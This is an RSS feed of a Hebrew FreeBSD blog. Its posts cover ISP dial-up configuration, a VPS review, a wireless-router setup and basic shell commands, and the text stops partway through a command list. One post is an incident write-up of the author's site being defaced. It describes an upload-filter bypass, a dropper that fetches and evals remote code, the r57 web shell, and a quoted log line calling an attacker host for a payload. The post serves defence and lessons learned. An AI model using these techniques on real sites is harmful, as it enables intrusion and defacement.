<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>&#8235;פרי-בי-אס-די (FreeBSD)&#8236;</title>	<atom:link href="http://www.blog.freebsd.co.il/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.blog.freebsd.co.il</link>
	<description>&#8235;הכח לשרת שלך&#8236;</description>	<lastBuildDate>Sun, 20 Feb 2011 14:20:32 +0000</lastBuildDate>
	<language>he</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>&#8235;התחברות לCCC&#8236;</title>		<link>http://www.blog.freebsd.co.il/2011/02/%d7%94%d7%aa%d7%97%d7%91%d7%a8%d7%95%d7%aa-%d7%9cccc/</link>
		<comments>http://www.blog.freebsd.co.il/2011/02/%d7%94%d7%aa%d7%97%d7%91%d7%a8%d7%95%d7%aa-%d7%9cccc/#comments</comments>
		<pubDate>Sun, 20 Feb 2011 13:40:03 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=137</guid>
		<description><![CDATA[&#8235;אחרי שנמאס לי לחכות לטעינת סרטונים ביוטיוב עם בזב&#34;ל, החלטתי למרות החוסר נוחות בחייגן לעבור לספקית החדשה, טריפל-סי. לקחתי את החבילה של ה-12 מגהביט והתחלתי להגדיר את החייגן. בתור החייגן שלי נבחר mpd5 שהתקנתי מהפורטס, אחריי קצת חיפוש בגוגל מצאתי כמה קבצי הגדרות של כמה חבר'ה רוסים: אחד שתיים, ומשם התחלתי להגדיר ולשנות (ההגדרות הסופיות [...]&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אחרי שנמאס לי לחכות לטעינת סרטונים ביוטיוב עם בזב&quot;ל, החלטתי למרות החוסר נוחות בחייגן לעבור לספקית החדשה, <a href="http://ccc.net.il/Domestic.aspx">טריפל-סי</a>. לקחתי את החבילה של ה-12 מגהביט והתחלתי להגדיר את החייגן.</p>
<p>בתור החייגן שלי נבחר <a href="http://mpd.sourceforge.net/">mpd5</a> שהתקנתי מהפורטס, אחריי קצת חיפוש בגוגל מצאתי כמה קבצי הגדרות של כמה חבר'ה רוסים: <a href="http://help.internet.beeline.ru/internet/install/freebsd/">אחד</a> <a href="http://www.lissyara.su/articles/freebsd/programms/mpd5_l2tp_client/">שתיים</a>, ומשם התחלתי להגדיר ולשנות (ההגדרות הסופיות בסוף).</p>
<p>כל פעם שניסיתי לחייג השרת (cable.ccc.net.il) כל הזמן היה סוגר את החיבור, ניסיתי שרתים של חברות אחרות (בזק, נטויז'ן, 012) שכמובן לא קיבלו ממני יוזר וסיסמא, אבל לפחות ראיתי איזשהו תהליך הזדהות מולם, השרת של טריפל-סי פשוט ניתק לי עם ההודעה: <strong>tunnel receive scccn avp unknown</strong>.</p>
<p>שמתי לב שגם השרת של 018 מנתק לי באותה צורה, ושגם ה-Vendor שהוא שולח זהה לזה של טריפל-סי: Juniper Networks, Inc. ניסיתי להתחבר מחלונות, שם החיוג עבר בהצלחה. מוזר, אולי הם לא אוהבים את זה שmpd5 שולח בשדה ייצרן FreeBSD? קימפלתי מחדש את mpd5 עם שדה יצרן מיקרוסופט, אך זה לא פתר את הבעיה, עדיין אותו ניתוק מעצבן. אחרי קצת זמן עם tcpdump ו wireshark מצאתי ש mpd5 כנראה שובר את הפרוטוקול ושולח את החבילה <a href="http://rfc-ref.org/RFC-TEXTS/2661/chapter6.html">SCCCN</a> עם שדות חובה שלא צריכים להיות שם, ועל זה השרת מתלונן.</p>
<p>אחריי קצת חפירה בקוד, בתוך l2tp_ctrl.c, שורה 2104:</p>
<pre>ppp_l2tp_ctrl_send(ctrl, 0, SCCCN, ctrl-&gt;avps);</pre>
<p>שיניתי את ctrl-&gt;avps ל NULL, כדי שלא ישלח את הAVP מ SCCRP יחד עם ה SCCCN, יכול להיות ששברתי פה מקרה קצה כלשהו בפרוטוקול, אבל עכשיו mpd5 מתחבר בהצלחה לטריפל-סי =)</p>
<p><a href="https://sourceforge.net/tracker/?func=detail&amp;aid=3187438&amp;group_id=14145&amp;atid=114145">באג שפתחתי בsourceforge לגבי mpd5.</a></p>
<p>mpd.conf</p>
<pre>startup:
# configure mpd users
set user username password admin
set console self 127.0.0.1 5005
set console open

default:
load l2tp_dial

l2tp_dial:
create bundle static L2TP
set iface up-script /usr/local/etc/mpd5/ccc_l2tp_up.sh
set iface down-script /usr/local/etc/mpd5/ccc_l2tp_down.sh

create link static L2 l2tp
set link action bundle L2TP
set link yes acfcomp protocomp

set link latency 0
set link max-redial 0
set link mru 1460
set link mtu 1460
set link keep-alive 0 20

set auth authname "user"
set auth password "pass"

set l2tp peer 109.226.0.17

open</pre>
<p>ccc_l2tp_up.sh</p>
<pre>#!/bin/sh
LocalGW=172.20.240.1
route delete $4
#route add $4 $LocalGW
route add 109.226.0.17 $LocalGW
route delete default
route add default $4

echo $4 &gt; /tmp/l2tp_GW
cp /etc/resolv.conf.ccc /etc/resolv.conf</pre>
<p>ccc_l2tp_down.sh</p>
<pre>#!/bin/sh

LocalGW=172.20.240.1
vpn_GW=`cat /tmp/l2tp_GW`

route delete $vpn_GW
route delete default
route add default $LocalGW

cp /etc/resolv.conf.hot /etc/resolv.conf</pre>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2011/02/%d7%94%d7%aa%d7%97%d7%91%d7%a8%d7%95%d7%aa-%d7%9cccc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8235;עברתי דירה&#8236;</title>		<link>http://www.blog.freebsd.co.il/2010/11/%d7%a2%d7%91%d7%a8%d7%aa%d7%99-%d7%93%d7%99%d7%a8%d7%94/</link>
		<comments>http://www.blog.freebsd.co.il/2010/11/%d7%a2%d7%91%d7%a8%d7%aa%d7%99-%d7%93%d7%99%d7%a8%d7%94/#comments</comments>
		<pubDate>Mon, 29 Nov 2010 10:48:36 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=133</guid>
		<description><![CDATA[&#8235;יותר נכון, אני עוד לא עברתי אבל הבלוג עבר לVPS שלי בארה&#34;ב.&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>יותר נכון, אני עוד לא עברתי אבל הבלוג עבר לVPS שלי בארה&quot;ב.</p>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2010/11/%d7%a2%d7%91%d7%a8%d7%aa%d7%99-%d7%93%d7%99%d7%a8%d7%94/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8235;איך הסקריפט קידדיז בכל זאת ניצחו&#8236;</title>		<link>http://www.blog.freebsd.co.il/2010/06/%d7%90%d7%99%d7%9a-%d7%94%d7%a1%d7%a7%d7%a8%d7%99%d7%a4%d7%98-%d7%a7%d7%99%d7%93%d7%93%d7%99%d7%96-%d7%91%d7%9b%d7%9c-%d7%96%d7%90%d7%aa-%d7%a0%d7%99%d7%a6%d7%97%d7%95/</link>
		<comments>http://www.blog.freebsd.co.il/2010/06/%d7%90%d7%99%d7%9a-%d7%94%d7%a1%d7%a7%d7%a8%d7%99%d7%a4%d7%98-%d7%a7%d7%99%d7%93%d7%93%d7%99%d7%96-%d7%91%d7%9b%d7%9c-%d7%96%d7%90%d7%aa-%d7%a0%d7%99%d7%a6%d7%97%d7%95/#comments</comments>
		<pubDate>Fri, 18 Jun 2010 13:14:12 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=118</guid>
		<description><![CDATA[&#8235;או שאולי יותר נכון, איך חוסר תשומת לב קטן עלול להפיל בפח. ביום רביעי, ה16 לחודש, בשעה 22:22 הגיעה מגוגל ישראל 87.109.217.210 חבר סעודי שכניראה חיפש אתרים ישראלים (למעשה הוא חיפש אתרים שבכתבות שלהם מופיע test ו upload) והתחיל לעבור כל העמודים שגוגל ישראל אינדקס מהאתר, ביניהם גם הדוגמאות קוד ב freebsd.co.il/test אחת הדוגמאות, שנכתבה [...]&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>או שאולי יותר נכון, איך חוסר תשומת לב קטן עלול להפיל בפח.</p>
<p>ביום רביעי, ה16 לחודש, בשעה 22:22 הגיעה מגוגל ישראל <strong>87.109.217.210</strong> חבר סעודי שכניראה חיפש אתרים ישראלים (למעשה הוא חיפש אתרים שבכתבות שלהם מופיע test ו upload) והתחיל לעבור כל העמודים שגוגל ישראל אינדקס מהאתר, ביניהם גם הדוגמאות קוד ב <a href="http://freebsd.co.il/test">freebsd.co.il/test</a> אחת הדוגמאות, שנכתבה לצורך דוגמא בלבד (וזאת הטעות), היא דוגמא להעלאת קובץ, בה השתמש הסעודי.</p>
<h2>איך הוא עשה את זה:</h2>
<ul>
<li>העלה קובץ שבראשו מופיע GIF98a וכך עקף את הבדיקה היחידה שיש בקובץ ההעלאה ל mime-type של תמונה</li>
<li>בעזרת הקובץ שהעלה הוא העלה קובץ נוסף, שמקבל URL כפרמטר, מוריד את הקובץ ומריץ אותו עם eval</li>
<li>בעזרת הקובץ החדש, הריץ את הסקריפט <a href="http://www.xfocus.net.ru/soft/r57.txt">PHP r57</a> כדאי שיהיה לו יותר קל והחליף את הindex.php בבלוג לזה <a href="http://zone-h.com/mirror/id/10922073">שלו</a>.</li>
</ul>
<h2>לקחים:</h2>
<ul>
<li>לא להשאיר סקריפטים זרוקים שלא נועדו ל-production.</li>
<li>לייצור sandbox לכל הניסויים, יוזר נפרד, דומיין נפרד.</li>
<li>לחסום כל תקשורת יוצאת מה sandbox.</li>
<li>לכתוב מערכת ששולחת SMS ברגע שהעמוד הראשי משתנה מהעותק הקיים.</li>
</ul>
<p><strong>עדכון:</strong></p>
<p>אחריי כמה חיפושים לפי תאריך שינוי, הסתבר שהסעודי (אם הוא בכלל סעודי) לא פראייר בכלל ושתל בכל מני סקריפטי php את הקוד שלו בשביל להוריד ולהריץ קבצים, שישר אחרי פרסום הפוסט הזה, שינה את הindex שוב עם איום שאם לא אסיר אותו הוא יפרוץ אליי כל הזמן או משהו כזה.</p>
<p>בנוסף לזה חסמתי את הטווח הסעודי, מה שלא הפריעו לו לחזור מטווח של he.net האמריקאים ולנסות להריץ את הקוד שלו ממקום אחר:</p>
<pre style="direction: ltr;">65.49.14.55 joomla.freebsd.co.il - [18/Jun/2010:18:29:42 +0300] "GET /includes/.svn/tmp/props/.i.php?t0v=http://74.86.202.236/~globalho/.a/o.oxo HTTP/1.0" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)"
</pre>
<p>זאת אומרת, http://74.86.202.236/~globalho עוד אתר שהחבר הסעודי שלנו הגיע אליו ומשמש לאחסון קבצים לפריצות הבאות.</p>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2010/06/%d7%90%d7%99%d7%9a-%d7%94%d7%a1%d7%a7%d7%a8%d7%99%d7%a4%d7%98-%d7%a7%d7%99%d7%93%d7%93%d7%99%d7%96-%d7%91%d7%9b%d7%9c-%d7%96%d7%90%d7%aa-%d7%a0%d7%99%d7%a6%d7%97%d7%95/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>&#8235;חבילת FreeBSD VPS אצל arpnetworks.com&#8236;</title>		<link>http://www.blog.freebsd.co.il/2010/04/%d7%97%d7%91%d7%99%d7%9c%d7%aa-freebsd-vps-%d7%90%d7%a6%d7%9c-arpnetworks-com-2/</link>
		<comments>http://www.blog.freebsd.co.il/2010/04/%d7%97%d7%91%d7%99%d7%9c%d7%aa-freebsd-vps-%d7%90%d7%a6%d7%9c-arpnetworks-com-2/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 19:03:44 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[vps]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=102</guid>
		<description><![CDATA[&#8235;אחרי חיפושים ממושכים אחריי VPS נורמלי שאוכל להריץ עליו FreeBSD ולקמפל עליו קרנל משלי, בעקבות המלצות בfreebsd-questions, החלטתי לנסות את arpnetworks. ב9 לאפריל הזמנתי, למחרת קיבלתי את החשבון: הגרפים לניצול רוחב פס לא מופיעים אוטמטית בפאנל ניהול וצריך לבקש שיוסיפו אותם ידנית, ביקשתי. בשביל לקבל גישה לconsole של הVPS, צריך להעיבר להם מפתח ציבור שלך [...]&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אחרי חיפושים ממושכים אחריי VPS נורמלי שאוכל להריץ עליו FreeBSD ולקמפל עליו קרנל משלי, בעקבות המלצות בfreebsd-questions, החלטתי לנסות את arpnetworks.</p>
<p>ב9 לאפריל הזמנתי, למחרת קיבלתי את החשבון:</p>
<ul>
<li>הגרפים לניצול רוחב פס לא מופיעים אוטמטית בפאנל ניהול וצריך לבקש שיוסיפו  אותם ידנית, ביקשתי.</li>
<li>בשביל לקבל גישה לconsole של הVPS, צריך להעיבר להם מפתח ציבור שלך כדאי שיוספו לשרת שמנתב גישה לconsole, או להתחבר באופן לא מוצפן מהVNC שיש להם, העברתי מפתח.</li>
<li>וביקשתי גם PTR ל IP (IPv4) שקיבלתי מהם.</li>
</ul>
<p>הבקשות הנ&quot;ל תופלו תוך יום, זמן סביר יחסית למחיר ולדחיפות הבקשות.</p>
<p>לקמפל קרנל חדש לקח לי בערך 40 דקות ועכשיו:</p>
<pre> sigma.freebsd.co.il 8.0-STABLE FreeBSD 8.0-STABLE #1: Fri Apr  9 19:49:50 IDT 2010
</pre>
<p>לVPS אפשר להתחבר עם VNC או console, שרץ אצלהם, לא על הVPS עצמו, נוח למקרה שדפקתי את החוקים בפיירוואל למשל, או למשל אם אני רוצה לחלק את המחיצות בצורה אחרת, הם משאירים את דיסק ההתנקה של המערכת ב&quot;כונן&quot; סידירום, אפשר לבחור ב&quot;BIOS&quot; לעלות מה CD ולעשות מה שרוצים.</p>
<p>בשבוע שהיה לי את הVPS עד עכשיו, לא ראיתי בעיות מיוחדות, היה לי קליינט שכל הזמן מחובר לIRC ולא ראיתי ניתוקים, מעבר לזה להתעסק עם זה לעומק השבוע לא היה לי זמן, סה&quot;כ אני ממליץ, המחיר משתלם וזה אחד הספקים הבודדים שמציע FreeBSD.</p>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2010/04/%d7%97%d7%91%d7%99%d7%9c%d7%aa-freebsd-vps-%d7%90%d7%a6%d7%9c-arpnetworks-com-2/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>&#8235;צריבת iso DVD&#8236;</title>		<link>http://www.blog.freebsd.co.il/2010/03/%d7%a6%d7%a8%d7%99%d7%91%d7%aa-iso-dvd/</link>
		<comments>http://www.blog.freebsd.co.il/2010/03/%d7%a6%d7%a8%d7%99%d7%91%d7%aa-iso-dvd/#comments</comments>
		<pubDate>Tue, 30 Mar 2010 15:15:09 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[iso]]></category>
		<category><![CDATA[צריבה]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=65</guid>
		<description><![CDATA[&#8235;קודם נטען את המודול atapicam, כי growisofs מצפה להתקן SCSI, ואילו לנו יש ATA. $ kldload atapicam ועכשיו נצרוב: $ growisofs -dvd-compat -Z /dev/cd0=bt4-pre-final.iso&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>
קודם נטען את המודול atapicam, כי growisofs מצפה להתקן SCSI, ואילו לנו יש ATA.
</p>
<pre>
$ kldload atapicam
</pre>
<p><strong>ועכשיו נצרוב:</strong></p>
<pre>
$ growisofs -dvd-compat -Z /dev/cd0=bt4-pre-final.iso
</pre>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2010/03/%d7%a6%d7%a8%d7%99%d7%91%d7%aa-iso-dvd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8235;שרת FreeBSD כנתב אלחוטי&#8236;</title>		<link>http://www.blog.freebsd.co.il/2010/03/%d7%a9%d7%a8%d7%aa-freebsd-%d7%9b%d7%a0%d7%aa%d7%91-%d7%90%d7%9c%d7%97%d7%95%d7%98%d7%99/</link>
		<comments>http://www.blog.freebsd.co.il/2010/03/%d7%a9%d7%a8%d7%aa-freebsd-%d7%9b%d7%a0%d7%aa%d7%91-%d7%90%d7%9c%d7%97%d7%95%d7%98%d7%99/#comments</comments>
		<pubDate>Tue, 30 Mar 2010 15:12:45 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אלחוטי]]></category>
		<category><![CDATA[נתב]]></category>
		<category><![CDATA[שרת]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=68</guid>
		<description><![CDATA[&#8235;איך להפטר מהנתב האלחוטי לתובת שרת פרי-בי-אס-די.&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><h2>למה זה טוב?</h2>
<p>
יש לי מחשב (המחשב שממנו את\ה קורא שורות אלו) שכל הזמן דלוק, אז למה להפעיל בנוסף עוד נתב אלחוטי? העברתי את כל הרשת האלחוטית למחשב הזה.<br />
אפשר לראות תמונה של <a href="http://twitpic.com/1cejb6">מבנה הרשת</a>.
</p>
<h2>מה צריך?</h2>
<ul>
<li>כרטיס רשת אלחוטי התומך במצב hostap, אני השתמשתי ב <a href="http://airodump.net/naked-wifi-edimax-7318-photogalery/">Edimax EW7318USG</a> שנקנה באייבורי. מי שמחליט להשתמש בכרטיס הזה, יש <a href="http://www.freebsd.org/cgi/query-pr.cgi?pr=usb/142427">פאטץ' קטנטן</a> שצריך לעשות, תלוי באיזה גרסת פרי-בי-אס-די משתמשים.</li>
<li>hostapd לניהול הרשת האלחוטית, מגיע עם ההתקנה של פרי-בי-אס-די.</li>
<li>שרת dhcp, יש ב net/isc-dhcp31-server.</li>
<li>פיירוואל בשביל ה-nat, אני השתמשתי ב pf.</li>
</ul>
<p>
קבצי ההגדרות השתמשתי בהם מפורטים מטה, התבססתי על קבצים <a href="http://www.howtoforge.com/setting_up_a_freebsd_wlan_access_point">מכאן</a>. לא הבאתי את ההגדרות של pf,  בגדול מה שצריך זה:
</p>
<pre>
nat on $ExtIF from $WifiIF:network to any -> ($ExtIF)
</pre>
<h2 style="text-align: left; direction:ltr;">/etc/rc.conf</h2>
<pre># all the wifi stuff:
ifconfig_rum0="inet 10.0.0.1 netmask 255.255.255.0 ssid FreeBSD media OFDM/54Mbps mode autoselect mediaopt hostap"

hostapd_enable="YES"            # wireless services (clients use wpa_supplicant)

dhcpd_enable="YES"                          # dhcpd enabled?
dhcpd_flags="-q"                            # command option(s)
dhcpd_conf="/usr/local/etc/dhcpd.conf"      # configuration file
dhcpd_ifaces="rum0"                         # ethernet interface(s)
dhcpd_withumask="022"                       # file creation mask
</pre>
<p>
הmediaopt הזה בנתיים נתן לי את הביצועים הכי טובים, כ-2 מגהבייט\ש, בשונה מהautoselect שנתן לי רק 100 קילובייט\ש.
</p>
<h2 style="text-align: left; direction:ltr;">/usr/local/etc/dhcpd.conf</h2>
<pre>log-facility daemon;
ddns-update-style none;
always-broadcast on;
default-lease-time 3600;
max-lease-time 86400;
authoritative;
option domain-name-servers 62.219.186.7, 192.115.106.35;
option domain-name "localnet.localdomain";
option netbios-name-servers 10.0.0.1;

subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.199;
        option broadcast-address 10.0.0.255;
        option subnet-mask 255.255.255.0;
        option routers 10.0.0.1;
}

host moon {
          hardware ethernet 00:xx:xx:xx:xx:xx;
          fixed-address 10.0.0.4;
}

host jenny-laptop {
          hardware ethernet 00:xx:xx:xx:xx:xx;
          fixed-address 10.0.0.5;
}</pre>
<h2 style="text-align: left; direction:ltr;">/etc/hostapd.conf</h2>
<pre>interface=rum0
driver=bsd
logger_syslog=-1
logger_syslog_level=0
logger_stdout=-1
logger_stdout_level=0
debug=1
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=wheel

#### IEEE 802.11 related config ####
ssid=FreeBSD
macaddr_acl=0
auth_algs=1
country_code=IL
hw_mode=g
own_ip_addr=10.0.0.1

#### IEEE 802.1X related config ####
ieee8021x=0
#### WPA/IEEE 802.11i config #####
wpa=2
wpa_passphrase=SOME_PASS_PHRASE
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
</pre>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2010/03/%d7%a9%d7%a8%d7%aa-freebsd-%d7%9b%d7%a0%d7%aa%d7%91-%d7%90%d7%9c%d7%97%d7%95%d7%98%d7%99/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8235;בניית עולם וליבה&#8236;</title>		<link>http://www.blog.freebsd.co.il/2009/07/%d7%91%d7%a0%d7%99%d7%99%d7%aa-%d7%a2%d7%95%d7%9c%d7%9d-%d7%95%d7%9c%d7%99%d7%91%d7%94/</link>
		<comments>http://www.blog.freebsd.co.il/2009/07/%d7%91%d7%a0%d7%99%d7%99%d7%aa-%d7%a2%d7%95%d7%9c%d7%9d-%d7%95%d7%9c%d7%99%d7%91%d7%94/#comments</comments>
		<pubDate>Sat, 11 Jul 2009 10:57:40 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=47</guid>
		<description><![CDATA[&#8235;תחילה נערוך את קובץ הגדרות הליבה שנמצא ב: /usr/src/sys/&#60;arch&#62;/conf כשאת arch צריך להחליף בארכטקטורה הנכונה, i386 או amd64 (לדוגמא). לאחר מכן נעבור ל/usr/src ונבצע: make buildworld &#38;&#38; make buildkernel KERNCONF=&#60;kernel name&#62; &#38;&#38; make installkernel KERNCONF=&#60;kernel name&#62; &#38;&#38; mergemaster -p make buildworld &#8211; בונה עולם make buildkernel &#8211; בונה ליבה עבור קובץ ההגדרות של הליבה שצויין [...]&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>תחילה נערוך את קובץ הגדרות הליבה שנמצא ב:</p>
<pre>/usr/src/sys/&lt;arch&gt;/conf</pre>
<p>כשאת arch צריך להחליף בארכטקטורה הנכונה, i386 או amd64 (לדוגמא).</p>
<p>לאחר מכן נעבור ל/usr/src ונבצע:</p>
<pre>make buildworld &amp;&amp; make buildkernel KERNCONF=&lt;kernel name&gt; &amp;&amp; make installkernel KERNCONF=&lt;kernel name&gt; &amp;&amp; mergemaster -p</pre>
<p>make buildworld &#8211; בונה עולם<br />
make buildkernel &#8211; בונה ליבה עבור קובץ ההגדרות של הליבה שצויין עם kernconf<br />
make installkernel &#8211; מתקין את הליבה<br />
mergemaster -p &#8211; מכין את התיקיה הזמנית עבור קבצי המערכת החדשים</p>
<p>עתה נבצא איתחול למערכת ונעבור שוב ל/usr/src</p>
<pre>make installworld &amp;&amp; mergemaster</pre>
<p><strong>לשים לב:</strong> אם משתמשים בZFS יש צורך לציין לinstallworld את הפרמטר NO_FSCHG=yes אחרת צפויה לנו <a href="http://old.nabble.com/zfs,-installworld-and-chflags-td20635162.html" target="_blank">הפתעה לא נעימה</a> שכבר נכוותי בה.</p>
<p>עקוב אחר ההוראות של mergemaster על מנת לעדכן את כל קבצי המערכת</p>
<p>אחריי עוד איתחול, נוכל למחוק את התוכן של /usr/obj<br />
ולהריץ</p>
<pre>make cleandir</pre>
<p>ב /usr/src</p>
<p>כמו שוודאי שמתם לב, לא עלינו בשום שלב בסינגל יוסר, כבר עדכנתי את המערכת שלי כמה פעמים בשיטה זו, ולא ראיתי שום בעיות, במקור ראיתי את הדרך הזו באחת מהרשימות תפוצה של פרי-בי-אס-די.</p>
</div>]]></content:encoded>			<wfw:commentRss>http://www.blog.freebsd.co.il/2009/07/%d7%91%d7%a0%d7%99%d7%99%d7%aa-%d7%a2%d7%95%d7%9c%d7%9d-%d7%95%d7%9c%d7%99%d7%91%d7%94/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8235;עבודה עם שרת FreeBSD מרוחק&#8236;</title>		<link>http://www.blog.freebsd.co.il/2009/05/%d7%a2%d7%91%d7%95%d7%93%d7%94-%d7%a2%d7%9d-%d7%a9%d7%a8%d7%aa-freebsd-%d7%9e%d7%a8%d7%95%d7%97%d7%a7/</link>
		<comments>http://www.blog.freebsd.co.il/2009/05/%d7%a2%d7%91%d7%95%d7%93%d7%94-%d7%a2%d7%9d-%d7%a9%d7%a8%d7%aa-freebsd-%d7%9e%d7%a8%d7%95%d7%97%d7%a7/#comments</comments>
		<pubDate>Fri, 01 May 2009 15:05:39 +0000</pubDate>
		<dc:creator>&#8235;יורי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.blog.freebsd.co.il/?p=49</guid>
		<description><![CDATA[&#8235;פעם, איי שם בעבר הרחוק, נהגו אנשים להשתמש ב-telnet (פרוטוקול וכלי) על מנת להתחבר לשרתים מרוחקים, ואז כל אחד שהיה יכול לשבת על הקו איי שם באמצע יכול היה לראות את כל המידע העובר בינך לבין השרת. הזמנים האלה אינם עוד, והיום משתמשים בSSH (בתרגום חופשי: מעתפת (שלל) מאובטחת), פרוטוקול מוצפן המאפשר רק לך ולשרת [...]&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>פעם, איי שם בעבר הרחוק, נהגו אנשים להשתמש ב-telnet (פרוטוקול וכלי) על מנת להתחבר לשרתים מרוחקים, ואז כל אחד שהיה יכול לשבת על הקו איי שם באמצע יכול היה לראות את כל המידע העובר בינך לבין השרת. הזמנים האלה אינם עוד, והיום משתמשים ב<a href="http://he.wikipedia.org/wiki/Secure_Shell">SSH</a> (בתרגום חופשי: מעתפת (שלל) מאובטחת), פרוטוקול מוצפן המאפשר רק לך ולשרת המרוחק לקבל את המידע.</p>
<h2>איך מתחברים?</h2>
<p>קודם כל נבחר תוכנת לקוח, שיודעת לדבר את שפת הSSH, למשל <a href="http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html">PuTTY</a> ונפעיל אותה. נמלע את הhost הרצוי (למשל freebsd.co.il) ונלחץ open. יפתח מסך שחור ובוא הבקשה לlogin (הלא הוא השם משתמש שלך בשרת המרוחק), לאחר הקשת השם משתמש ולחיצת אנטר, תקבל בקשה לסיסמא, אך עתה, כשתקיש את הסיסמא, לא יראו תווים או כוכביות, אלה כדרכם של יוניקסים למניהם, לא תראה דבר, למרות שהתווים שם! הקש את הסיסמא ולחץ אנטר. אם הכל הלך כמו שצריך, אתה צריך לקבל את השורת פקודה של המעטפת (<a href="http://he.wikipedia.org/wiki/%D7%9E%D7%A2%D7%98%D7%A4%D7%AA_%D7%A4%D7%A7%D7%95%D7%93%D7%94">shell</a>).</p>
<h2>התחברת, מה עכשיו?</h2>
<p>עכשיו כותבים פקודות =)</p>
<ul>
<li>ls &#8211; רשימת קבצים בתיקיה הנוכחית</li>
<li>pwd &#8211; מראה את השם של התיקיה הנוכחית</li>
<li>cd &#8211; החלף תיקיה, למשל cd directory מחליף תיקיה לתיקיה directory.</li>
<li>cd ~ &#8211; מחזיר אותך לתיקיית הבית שלך.</li>
<li>cat &#8211; מראה תוכן של קובץ מסויים, למשל cat file.txt.</li>
<li>passwd &#8211; להחליף סיסמא</li>
<li>w &#8211; מראה משתמשים מחוברים.</li>
<li>write &#8211; לכתוב הודעה למשתמש מחובר, למשל write yury יתן לכתוב הודעה למשתמש yury.</li>
<li>mesg &#8211; להדליק \ לכבות הודעות שנכתבות עם write, למשל mesg n מכבה הודעות.</li>
<li>uptime &#8211; כמ זמן השרת פועל מאז שהמערכת עלתה + עומסים.</li>
<li>ps &#8211; רשימת התהליכים (תוכנות) הרצות.</li>
<li>top &#8211; מנהל תהליכים.</li>
<li>mkdir &#8211; יצירת תיקיה, בשביל לייצור תיקיה בשם test נשתמש בפקודה: mkdir test</li>
<li>cp &#8211; התעתקת קובץ, למשל: cp file1 file2</li>
<li>mv &#8211; העברת קובץ (גם שינוי שם), למשל: mv file1 file2</li>
<li>rm &#8211; מחיקת קובץ, למשל rm file</li>
<li>rmdir &#8211; מחיקת תיקיה, למשל rmdir test</li>
<li>man &#8211; מראה מידע על פקודה \ תוכנה \ קריאת מערכת \ פונקציית C, למשל: man strlen או man cp</li>
<li>gcc &#8211; מהדר סי, על מנת להדר קובץ נרשום: gcc file.c -o myExecutable</li>
<li>./ &#8211; הרצת קובץ, למשל: ./myExecutable</li>
